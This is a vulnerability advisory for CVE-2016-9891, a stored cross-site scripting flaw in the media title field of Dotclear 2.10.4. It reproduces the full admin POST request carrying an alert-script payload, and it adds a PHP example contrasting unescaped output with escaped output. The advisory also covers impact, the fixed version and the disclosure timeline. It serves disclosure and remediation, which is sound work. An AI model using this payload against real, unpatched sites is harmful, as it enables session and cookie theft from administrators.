[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4
Product Information:
Software: Dotclear
Tested Version: 2.10.4, released 02.11.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)
Vulnerability description:
There is an XSS vulnerability in the /dotcl/admin/media_item.php page.
When an authenticated user of Dotclear renames the file title, the following POST request is sent to the server:
POST /dotcl/admin/media_item.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae
The parameter media_title is vulnerable to XSS.
The stored payload is executed whenever an authenticated user navigates to the /dotcl/admin/media.php page.
The same media.php page is loaded when embedding an image or adding an attachment under Entries, so the payload triggers there as well.
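The following is an added example, not Dotclear's own code: a simplified model of a media listing page that echoes a user-controlled title (the media_title value from the request above) without escaping, next to the hardened form that escapes at the HTML output sink. The function and variable names are assumptions made for this illustration.

```php
<?php
// Added illustration, not taken from Dotclear: models how a media list
// renders a stored, attacker-controlled title such as media_title.
declare(strict_types=1);

/** Vulnerable pattern: the stored title is interpolated into HTML unchanged. */
function renderMediaRowVulnerable(string $file, string $title): string
{
    // $title was submitted as the media_title POST parameter and stored as-is,
    // so "<script>alert(0)</script>.png" becomes live markup on media.php.
    return '<tr><td>' . $file . '</td><td>' . $title . '</td></tr>';
}

/** Hardened pattern: escape every user-controlled value at the HTML output sink. */
function renderMediaRowSafe(string $file, string $title): string
{
    // ENT_QUOTES also escapes ' and " so the value stays inert inside attributes;
    // ENT_SUBSTITUTE avoids an empty result on invalid UTF-8 instead of silently dropping output.
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<tr><td>' . $esc($file) . '</td><td>' . $esc($title) . '</td></tr>';
}

// Constructed input, reusing the payload from the advisory's request body.
$file  = 'testimage.png';
$title = '<script>alert(0)</script>.png';

$vulnerable = renderMediaRowVulnerable($file, $title);
$hardened   = renderMediaRowSafe($file, $title);

echo 'Vulnerable: ' . $vulnerable . PHP_EOL;
echo 'Hardened:   ' . $hardened . PHP_EOL;

// A minimal regression check: the hardened output must not contain a raw <script> tag.
assert(strpos($vulnerable, '<script>') !== false);
assert(strpos($hardened, '<script>') === false);
assert(strpos($hardened, '&lt;script&gt;') !== false);
```

Escaping at the output sink is the relevant fix here, because the title is stored and rendered later on a different page than the one that accepted it.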
Impact:
An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).
Solution:
Update to the latest version, which is 2.11.1 (fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11
Timeline:
Vulnerability found: 26.11.2016
Vendor informed: 05.12.2016
Response by vendor: 05.12.2016
Fix by vendor: 05.12.2016
Patched version released: 28.12.2016
Public Advisory: 29.12.2016
References: